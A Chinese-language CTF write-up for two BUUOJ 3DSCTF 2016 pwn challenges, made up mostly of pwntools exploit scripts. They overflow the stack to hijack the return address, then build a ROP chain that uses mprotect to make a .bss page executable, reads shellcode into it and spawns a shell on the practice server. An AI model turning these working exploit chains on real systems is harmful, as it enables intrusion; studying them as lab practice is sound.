直接把返回地址覆蓋成 if 分支里的 get_flag 函數：本地可以打通，遠程卻打不通（推測是 get_flag 返回後程序崩潰、stdout 緩衝區來不及刷到 socket，所以看不到輸出——需進一步確認）
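from pwn import *

# Baseline attempt: overwrite the saved return address with get_flag() and
# nothing else.  The page records that this works against a local process but
# not against the remote service; it is kept as the reference the mprotect
# chain later on the page improves upon.
BINARY = './get_started_3dsctf_2016'
PAD = 0x38                  # distance from the overflowed buffer to the saved EIP
GET_FLAG_ADDR = 0x80489b8   # address of the get_flag() branch inside the if

# `args` is pwntools' argv parser: `python exp.py REMOTE` targets the service,
# anything else (the default, as in the original) runs the binary locally.
if args.REMOTE:
    r = remote('node3.buuoj.cn', 25775)
else:
    r = process(BINARY)

# bytes rather than str so the script also runs on Python 3, where
# 'a' * n + p32(...) raises TypeError (str + bytes).
payload = b'a' * PAD + p32(GET_FLAG_ADDR)
r.sendline(payload)
r.interactive()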
不過程序自帶 mprotect 函數（可以在 ELF 符號表里找到），它可以修改程序內存頁的保護屬性（可讀/可寫/可執行）
int mprotect(const void *start, size_t len, int prot); // start：要修改的起始內存地址（必須按頁對齊，否則返回 EINVAL）；len：修改的長度（按頁向上取整）；prot：新的權限位（PROT_READ=1、PROT_WRITE=2、PROT_EXEC=4，按位或組合）
可以利用 mprotect 函數把 bss 段所在的一整頁（起始地址頁對齊，長度 0x1000）改成可讀可寫可執行，再用 read 往這一頁寫入 shellcode，最後跳轉到該地址執行來 getshell。兩次函數調用之間用 pop;pop;pop;ret gadget 清掉棧上的三個參數，這樣鏈才能接到下一次調用
詳情步驟參考這里（原始連結在此頁面中未保留）
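from pwn import *

context(arch='i386', os='linux')

# ROP chain:
#   mprotect(MPR_START, MPR_LEN, RWX)  ->  read(0, MPR_START, len(shellcode))  ->  jmp MPR_START
# After each call a pop;pop;pop;ret gadget discards the three arguments so the
# chain continues with the next call.
BINARY = './get_started_3dsctf_2016'
PAD = 0x38                  # distance from the overflowed buffer to the saved EIP
PPP3_RET = 0x080483b8       # pop; pop; pop; ret gadget inside the binary

# Page in .bss that is made executable and then filled with shellcode.
MPR_START = 0x80eb000
MPR_LEN = 0x1000
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4
MPR_PROT = PROT_READ | PROT_WRITE | PROT_EXEC   # == 7, as in the original

# mprotect() rejects an unaligned start address with EINVAL; the chain would
# then jump into a non-executable page and simply crash, so fail early here.
if MPR_START % 0x1000 != 0:
    raise ValueError('MPR_START must be page aligned')

elf = ELF(BINARY)
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']

shellcode = asm(shellcraft.sh())

# `python exp.py LOCAL` runs the binary locally; default is the remote service.
r = process(BINARY) if args.LOCAL else remote('node3.buuoj.cn', 25775)

chain = [
    mprotect_addr, PPP3_RET, MPR_START, MPR_LEN, MPR_PROT,
    read_addr, PPP3_RET, 0, MPR_START, len(shellcode),
    MPR_START,
]
# bytes throughout so the script runs on Python 3 (str + p32() is a TypeError).
payload = b'a' * PAD + b''.join(p32(v) for v in chain)
r.sendline(payload)

# read() was asked for exactly len(shellcode) bytes, so use send(): the extra
# '\n' that sendline() appends would stay in the socket and be fed to the shell.
r.send(shellcode)
r.interactive()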
not_the_same_3dsctf_2016
與上一題同樣的思路（mprotect + read + 跳轉到 bss），只是溢出偏移（0x2d 而非 0x38）、端口和二進制文件名不同
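from pwn import *

context(arch='i386', os='linux')

# Same mprotect -> read -> jump chain as for get_started_3dsctf_2016; only the
# overflow offset, the port and the binary differ.
BINARY = './not_the_same_3dsctf_2016'
PAD = 0x2d                  # distance from the overflowed buffer to the saved EIP
PPP3_RET = 0x080483b8       # pop; pop; pop; ret gadget inside the binary

# Page in .bss that is made executable and then filled with shellcode.
MPR_START = 0x080eb000
MPR_LEN = 0x1000
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4
MPR_PROT = PROT_READ | PROT_WRITE | PROT_EXEC   # == 7, as in the original

# mprotect() rejects an unaligned start address with EINVAL; fail early rather
# than jump into a page that never became executable.
if MPR_START % 0x1000 != 0:
    raise ValueError('MPR_START must be page aligned')

elf = ELF(BINARY)
read_addr = elf.symbols['read']
mprotect_addr = elf.symbols['mprotect']

shellcode = asm(shellcraft.sh())

# `python exp.py LOCAL` runs the binary locally; default is the remote service.
r = process(BINARY) if args.LOCAL else remote('node3.buuoj.cn', 28393)

chain = [
    mprotect_addr, PPP3_RET, MPR_START, MPR_LEN, MPR_PROT,
    read_addr, PPP3_RET, 0, MPR_START, len(shellcode),
    MPR_START,
]
# bytes throughout so the script runs on Python 3 (str + p32() is a TypeError).
payload = b'a' * PAD + b''.join(p32(v) for v in chain)
r.sendline(payload)

# read() consumes exactly len(shellcode) bytes; send() avoids leaving the
# trailing '\n' of sendline() in the socket for the spawned shell to read.
r.send(shellcode)
r.interactive()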